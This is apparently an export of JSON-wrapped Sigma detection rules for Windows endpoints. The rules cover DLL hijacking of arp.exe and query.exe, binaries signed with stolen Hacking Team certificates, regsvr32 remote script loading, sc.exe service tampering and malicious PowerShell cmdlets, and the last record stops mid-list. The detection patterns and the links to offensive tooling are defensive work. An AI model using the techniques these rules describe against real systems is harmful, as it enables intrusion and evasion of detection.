"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e07c8f70-5bf0-46b1-8151-7bddc3acca2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087952Z",
"creation_date": "2026-03-23T11:45:34.087954Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087966Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://blog.talosintelligence.com/old-certificate-new-signature/",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_hacking_team_stolen_cert_process_execution.yml",
"content": "title: Process Executed Signed with Hacking Team Certificate\nid: e07c8f70-5bf0-46b1-8151-7bddc3acca2e\ndescription: |\n Detects the execution of a process signed using one of Hacking Team certificates.\n HackingTeam is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\n This can be the sign of a malware using a fake signature to evade AV/EDR detection.\n It is recommended to analyze the binary to search for malicious contents.\nreferences:\n - https://blog.talosintelligence.com/old-certificate-new-signature/\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2023/07/13\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.StolenCertificate\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint:\n - '2A1DA6DC8635E6C725CCCBE6C035EEC813FBEB2E' # Certum Level III CA - Open Source Developer, William Zoltan\n - '6C5886C0DA723E8B2AEC8C02392D4B175E793EBE' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B366DBE8B3E81915CA5C5170C65DCAD8348B11F0' # VeriSign Class 3 Code Signing 2010 CA - HT Srl\n - 'B7C646E3A433986E165BA45B209DA4A2C4111939' # Certum Code Signing CA - Luca Marcone\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e07c8f70-5bf0-46b1-8151-7bddc3acca2e",
"rule_name": "Process Executed Signed with Hacking Team Certificate",
"rule_description": "Detects the execution of a process signed using one of Hacking Team's certificates.\nHacking Team is an Italian information technology company that sells offensive intrusion and surveillance capabilities to governments, law enforcement agencies and corporations.\nThis can be a sign of malware using a fake signature to evade AV/EDR detection.\nIt is recommended to analyze the binary to search for malicious content.\n",
"rule_creation_date": "2023-07-13",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e08056f7-9f9e-4eb9-bed2-2d78b6a503ef",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081394Z",
"creation_date": "2026-03-23T11:45:34.081396Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081401Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_arp.yml",
"content": "title: DLL Hijacking via arp.exe\nid: e08056f7-9f9e-4eb9-bed2-2d78b6a503ef\ndescription: |\n Detects potential Windows DLL Hijacking via arp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'arp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\IPHLPAPI.DLL'\n - '\\snmpapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e08056f7-9f9e-4eb9-bed2-2d78b6a503ef",
"rule_name": "DLL Hijacking via arp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via arp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e090a723-0744-49e2-9bf3-4ff220b193f1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079214Z",
"creation_date": "2026-03-23T11:45:34.079216Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079221Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1059.006/"
],
"name": "t1204_001_url_shortcut_via_cmd.yml",
"content": "title: URL Shortcut Created via cmd.exe\nid: e090a723-0744-49e2-9bf3-4ff220b193f1\ndescription: |\n Detects the suspicious creation of a .url shortcut via cmd.\n Attackers can create URL shortcuts to lure users to execute a malicious payload or as a means to establish persistence by, for instance, placing the shortcut in the startup directory.\n It is recommended to analyze the process creating the shortcut as well as the shortcut itself for malicious content.\nreferences:\n - https://attack.mitre.org/techniques/T1059.006/\ndate: 2024/05/13\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.InitialAccess\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n CommandLine|contains|all:\n - 'echo [InternetShortcut]'\n - 'echo URL='\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e090a723-0744-49e2-9bf3-4ff220b193f1",
"rule_name": "URL Shortcut Created via cmd.exe",
"rule_description": "Detects the suspicious creation of a .url shortcut via cmd.\nAttackers can create URL shortcuts to lure users to execute a malicious payload or as a means to establish persistence by, for instance, placing the shortcut in the startup directory.\nIt is recommended to analyze the process creating the shortcut as well as the shortcut itself for malicious content.\n",
"rule_creation_date": "2024-05-13",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0973520-fb65-4938-9f52-9eb6a7609f63",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619330Z",
"creation_date": "2026-03-23T11:45:34.619332Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619337Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1068_unprivileged_user_modifying_service_config_through_sc.yml",
"content": "title: Unprivileged User Modified Service Configuration via sc.exe\nid: e0973520-fb65-4938-9f52-9eb6a7609f63\ndescription: |\n Detects a low integrity user launching sc.exe with specific command-line arguments.\n An unprivileged user can perform privilege escalation by exploiting a service's weak permissions and modifying its configuration through sc.exe.\n It is recommended to investigate the registry keys modified by the sc.exe binary and the \"binPath\" argument to look for paths pointing to malicious content.\n This rule is often triggered by Remote Monitoring and Management (RMM) tools, it is recommended to verify if this is expected in your environment.\nreferences:\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/09/07\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - attack.persistence\n - attack.t1574.010\n - attack.t1574.011\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Exploitation\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n IntegrityLevel:\n - 'Low'\n - 'Medium'\n\n selection_args_1:\n CommandLine|contains|all:\n - 'config'\n - 'binPath'\n\n selection_args_2:\n CommandLine|contains|all:\n - 'failure'\n - 'command'\n\n condition: selection and 1 of selection_args_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0973520-fb65-4938-9f52-9eb6a7609f63",
"rule_name": "Unprivileged User Modified Service Configuration via sc.exe",
"rule_description": "Detects a low-integrity user launching sc.exe with specific command-line arguments.\nAn unprivileged user can perform privilege escalation by exploiting a service's weak permissions and modifying its configuration through sc.exe.\nIt is recommended to investigate the registry keys modified by the sc.exe binary and the \"binPath\" argument to look for paths pointing to malicious content.\nThis rule is often triggered by Remote Monitoring and Management (RMM) tools; it is recommended to verify whether this is expected in your environment.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1574.010",
"attack.t1574.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e09e6a31-8fad-48d4-a795-a6a24020c650",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.593134Z",
"creation_date": "2026-03-23T11:45:34.593137Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.593144Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_query.yml",
"content": "title: DLL Hijacking via query.exe\nid: e09e6a31-8fad-48d4-a795-a6a24020c650\ndescription: |\n Detects potential Windows DLL Hijacking via query.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'query.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\REGAPI.dll'\n - '\\samcli.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\utildll.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e09e6a31-8fad-48d4-a795-a6a24020c650",
"rule_name": "DLL Hijacking via query.exe",
"rule_description": "Detects potential Windows DLL Hijacking via query.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0a4c001-5e60-4bb3-ad0c-3b39e89483be",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.607560Z",
"creation_date": "2026-03-23T11:45:34.607564Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.607571Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://twitter.com/pr0xylife/status/1571908774021013504",
"https://twitter.com/Max_Mal_/status/1542461200797163522",
"https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/",
"https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://attack.mitre.org/techniques/T1059/",
"https://attack.mitre.org/techniques/T1218/010/"
],
"name": "t1059_suspicious_execution_of_regsvr32.yml",
"content": "title: Suspicious Direct DLL Execution via Regsvr32\nid: e0a4c001-5e60-4bb3-ad0c-3b39e89483be\ndescription: |\n Detects the direct execution of a DLL through Regsvr32 with a suspicious context (Office applications, renamed DLLs etc.).\n Attackers often use Regsvr32 as a stealthier way to run their DLL payloads.\n It is recommended to investigate the ancestor processes and the contents of the DLL to determine if this action was legitimate.\nreferences:\n - https://twitter.com/pr0xylife/status/1571908774021013504\n - https://twitter.com/Max_Mal_/status/1542461200797163522\n - https://lolbas-project.github.io/lolbas/Binaries/Regsvr32/\n - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n - https://attack.mitre.org/techniques/T1059/\n - https://attack.mitre.org/techniques/T1218/010/\ndate: 2022/09/26\nmodified: 2025/10/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059\n - attack.defense_evasion\n - attack.t1218.010\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Regsvr32\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'regsvr32.exe'\n - Image|endswith: '\\regsvr32.exe'\n\n # Suspicious DLL extensions\n selection_extensions:\n CommandLine|endswith:\n - '.jpg'\n - '.jpeg'\n - '.png'\n - '.gif'\n - '.bin'\n - '.tmp'\n - '.temp'\n - '.txt'\n\n # DLL execution from suspicious folders\n selection_folder:\n CommandLine|contains:\n - '\\AppData\\Roaming\\Microsoft'\n - '\\AppData\\Local\\Temp'\n - '?:\\Users\\Public'\n - '?:\\PerfLogs\\'\n\n # Remote SCT script execution via scrobj\n selection_remote_sct_1:\n CommandLine|contains|all:\n - 'i:'\n - 'http'\n - 'scrobj.dll'\n\n selection_remote_sct_2:\n CommandLine|contains|all:\n - 'i:'\n - 'ftp'\n - 'scrobj.dll'\n\n selection_powershell:\n ParentImage|endswith:\n - '\\powershell.exe'\n - 
'\\pwsh.exe'\n - '\\powershell_ise.exe'\n\n selection_mshta:\n ParentImage|endswith: '\\mshta.exe'\n\n selection_wscript:\n GrandparentImage|endswith: '\\wscript.exe'\n\n selection_office:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE' # related to CVE 2017-11882\n\n exclusion_commandline:\n CommandLine:\n - '?:\\windows\\system32\\regsvr32.exe /* ?:\\Program Files\\\\*.dll'\n - '?:\\windows\\system32\\regsvr32.exe /* ?:\\Program Files (x86)\\\\*.dll'\n - '?:\\Windows\\System32\\regsvr32.exe /* ?:\\WINDOWS\\\\*.dll'\n - '?:\\Windows\\System32\\regsvr32.exe /u /s ?:\\MININT\\Tools\\X64\\TSCore.dll'\n - '?:\\Windows\\System32\\regsvr32.exe /s ?:\\Users\\\\*\\AppData\\Local\\Temp\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Windows\\AdminArsenal\\PDQDeployRunner\\service-?\\PDQDeployRunner-?.exe'\n - '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Program Files\\Nexthink\\Collector\\Coordinator\\nxtcod.exe'\n - '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\SWD\\SDCLIENT.EXE'\n\n exclusion_lenovo:\n CommandLine|contains:\n - '?:\\ProgramData\\Lenovo\\ImController\\Plugins\\LenovoBatteryGaugePackage\\'\n - '?:\\ProgramData\\Lenovo\\Vantage\\Addins\\LenovoBatteryGaugeAddin\\\\*\\LenovoBatteryGaugePackage.dll'\n\n exclusion_printing:\n ParentImage|endswith:\n - '\\WINWORD.EXE'\n - '\\EXCEL.EXE'\n - '\\OUTLOOK.EXE'\n - '\\MSPUB.EXE'\n - '\\POWERPNT.EXE'\n - '\\VISIO.EXE'\n - '\\EQNEDT32.EXE'\n CommandLine|contains: 'OnPrinterAccess'\n\n # Microsoft Deployment Toolkit\n exclusion_mdt1:\n ParentCommandLine:\n - '?:\\Windows\\System32\\wscript.exe *\\Scripts\\LTICleanup.wsf'\n - '?:\\windows\\system32\\wscript.exe *\\Scripts\\LiteTouch.wsf'\n CommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\'\n - '\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n exclusion_mdt2:\n 
ParentCommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\'\n - '\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n CommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\'\n - '\\Tools\\x??\\Microsoft.BDD.Utility.dll'\n\n exclusion_mdt3:\n GrandparentCommandLine|contains: 'wscript.exe *\\Scripts\\LiteTouch.wsf'\n\n exclusion_genapi:\n ParentImage: '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\inot...*\\GenApi.*.exe'\n\n exclusion_nexthink:\n CommandLine: '?:\\Windows\\system32\\regsvr32.exe /s ?:\\Windows\\System32\\wbem\\\\*.dll'\n ParentImage: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n GrandparentImage: '?:\\Program Files\\Nexthink\\Collector\\Coordinator\\nxtcod.exe'\n\n exclusion_landesk:\n GrandparentImage|startswith: '?:\\Program Files (x86)\\LANDesk\\LDClient\\sdmcache\\'\n\n exclusion_ivanti:\n GrandparentImage|startswith: '?:\\Program Files (x86)\\Ivanti\\EPM Agent\\sdmcache\\'\n\n exclusion_sccm:\n - Ancestors|contains|all:\n - '?:\\Windows\\ccmcache\\'\n - '|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n - ParentCommandLine|contains: '?:\\WINDOWS\\ccmcache\\'\n GrandparentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n condition: selection and 1 of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "e0a4c001-5e60-4bb3-ad0c-3b39e89483be",
"rule_name": "Suspicious Direct DLL Execution via Regsvr32",
"rule_description": "Detects the direct execution of a DLL through Regsvr32 with a suspicious context (Office applications, renamed DLLs etc.).\nAttackers often use Regsvr32 as a stealthier way to run their DLL payloads.\nIt is recommended to investigate the ancestor processes and the contents of the DLL to determine if this action was legitimate.\n",
"rule_creation_date": "2022-09-26",
"rule_modified_date": "2025-10-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1218.010"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "e0fe5da5-765a-4b7d-9af5-6b711030daa3",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296640Z",
"creation_date": "2026-03-23T11:45:35.296642Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296646Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/Kevin-Robertson/Inveigh",
"https://gist.github.com/monoxgas/9d238accd969550136db",
"https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1",
"https://github.com/secmode/Invoke-Apex",
"https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts",
"https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1",
"https://github.com/danielbohannon/Invoke-CradleCrafter",
"https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1",
"https://github.com/AlsidOfficial/WSUSpendu",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powershell_malicious_cmdlet_cmd.yml",
"content": "title: Malicious PowerShell Commandlets in Command-line\nid: e0fe5da5-765a-4b7d-9af5-6b711030daa3\ndescription: |\n Detects various malicious commandlets in PowerShell's command-line, generally associated with online repositories containing attack codes to perform memory-only attacks.\n Attackers may use various PowerShell frameworks as they are easily installed and offer a very large panel of interactive functionnalities.\n It is recommended to analyze the executed PowerShell script as well as the ancestors of the host process to determine whether this action is legitimate.\nreferences:\n - https://github.com/Kevin-Robertson/Inveigh\n - https://gist.github.com/monoxgas/9d238accd969550136db\n - https://gist.github.com/HarmJ0y/c84065c0c487d4c74cc1\n - https://github.com/secmode/Invoke-Apex\n - https://github.com/Mr-Un1k0d3r/RedTeamPowershellScripts\n - https://raw.githubusercontent.com/FuzzySecurity/PowerShell-Suite/master/Start-Eidolon.ps1\n - https://github.com/danielbohannon/Invoke-CradleCrafter\n - https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-MicrophoneAudio.ps1\n - https://github.com/AlsidOfficial/WSUSpendu\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2021/03/05\nmodified: 2026/02/23\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.defense_evasion\n - attack.t1059.001\n - attack.t1562.001\n - attack.t1562.006\n - attack.collection\n - attack.t1125\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_powershell:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmdlet:\n CommandLine|contains:\n # Invoke-Inveigh, from Inveigh\n - 'Invoke-Inveigh'\n - 